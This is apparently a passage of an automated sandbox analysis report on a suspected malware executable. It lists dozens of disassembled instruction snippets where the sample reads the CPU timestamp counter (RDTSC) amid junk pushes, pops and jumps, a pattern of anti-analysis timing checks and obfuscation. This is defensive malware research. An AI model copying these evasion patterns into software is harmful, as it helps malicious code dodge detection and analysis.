Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911333 second address: 911351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911351 second address: 911380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F5F64D1DABCh 0x00000019 jne 00007F5F64D1DAB6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911380 second address: 91138A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5F64D1DF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911451 second address: 91145B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91145B second address: 91148C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF22h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91148C second address: 911492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 918082 second address: 918086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89FD09 second address: 89FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916D95 second address: 916D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916D9B second address: 916DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DAC1h 0x0000000a jmp 00007F5F64D1DAC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916DCE second address: 916DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916DD2 second address: 916DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917923 second address: 91792D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DF1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89FCFD second address: 89FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5F64D1DABCh 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917A5F second address: 917A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F5F64D1DF16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917A71 second address: 917AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5F64D1DAC6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DAC4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AA7 second address: 917AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AAD second address: 917AB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AB4 second address: 917ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917ABD second address: 917AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DAC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AD5 second address: 917AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AD9 second address: 917ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917C56 second address: 917C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F08 second address: 917F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F16 second address: 917F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DF16h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F24 second address: 917F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F29 second address: 917F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91BB01 second address: 91BB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5F64D1DAB6h 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007F5F64D1DAB6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F5F64D1DAB6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E6FE9 second address: 8D1664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5F64D1DF16h 0x00000009 jns 00007F5F64D1DF16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F5F64D1DF21h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F5F64D1DF18h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 sbb di, 19B5h 0x00000038 call dword ptr [ebp+12450DF6h] 0x0000003e push edi 0x0000003f pushad 0x00000040 jmp 00007F5F64D1DF27h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7196 second address: 8E719B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E719B second address: 8E71B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E770A second address: 8E7725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DAC0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7725 second address: 8E776E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5F64D1DF2Eh 0x0000000c jmp 00007F5F64D1DF28h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F5F64D1DF1Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5F64D1DF20h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E776E second address: 8E7772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7772 second address: 8E7796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b jnp 00007F5F64D1DF16h 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push esi 0x00000019 jne 00007F5F64D1DF16h 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7796 second address: 8E779A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E78D8 second address: 8E78DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E79F1 second address: 8E79FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E79FB second address: 8E7A12 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A12 second address: 8E7A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A18 second address: 8E7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A1D second address: 8E7A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A23 second address: 8E7A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A27 second address: 8E7A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A2B second address: 8E7A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jc 00007F5F64D1DF1Eh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7C45 second address: 8E7C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7C4B second address: 8E7C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8079 second address: 8E8084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8084 second address: 8E808D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E838C second address: 8E8392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8392 second address: 8E8396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8396 second address: 8E83AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F5F64D1DAB8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E83AC second address: 8E83C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E84C4 second address: 8E8519 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5F64D1DAB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 xor dword ptr [ebp+122D31BBh], esi 0x0000002e add ecx, dword ptr [ebp+122D2AB7h] 0x00000034 lea eax, dword ptr [ebp+1247BD74h] 0x0000003a or dl, FFFFFFCAh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jng 00007F5F64D1DAB6h 0x00000047 jnp 00007F5F64D1DAB6h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8519 second address: 8E856D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F5F64D1DF16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2A4Fh] 0x00000015 jng 00007F5F64D1DF1Bh 0x0000001b lea eax, dword ptr [ebp+1247BD30h] 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F5F64D1DF18h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b nop 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007F5F64D1DF16h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E856D second address: 8E8587 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F5F64D1DAC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F5F64D1DAB6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8587 second address: 8E858B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F357 second address: 91F35B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F35B second address: 91F37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5F64D1DF1Bh 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F5F64D1DF16h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F5F7 second address: 91F5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F5FB second address: 91F610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F610 second address: 91F64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5F64D1DAD3h 0x0000000c jmp 00007F5F64D1DABEh 0x00000011 jmp 00007F5F64D1DABFh 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F64D second address: 91F651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F651 second address: 91F680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 jmp 00007F5F64D1DAC4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F680 second address: 91F69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FA59 second address: 91FA83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5F64D1DABAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FA83 second address: 91FA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC0F second address: 91FC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DABEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC24 second address: 91FC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F5F64D1DF16h 0x0000000d jmp 00007F5F64D1DF1Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC3F second address: 91FC43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924592 second address: 924596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924596 second address: 92459A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92459A second address: 9245A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246D4 second address: 9246E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5F64D1DAB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246E0 second address: 9246E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246E4 second address: 9246F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246F4 second address: 924717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5F64D1DF16h 0x0000000a js 00007F5F64D1DF16h 0x00000010 popad 0x00000011 jmp 00007F5F64D1DF1Fh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924717 second address: 92471D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92471D second address: 924723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924B77 second address: 924B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924B84 second address: 924BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF28h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924BA1 second address: 924BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924FC3 second address: 924FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92BD41 second address: 92BD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5F64D1DABCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB70A second address: 8AB70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB70E second address: 8AB712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB712 second address: 8AB73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c jmp 00007F5F64D1DF1Ch 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
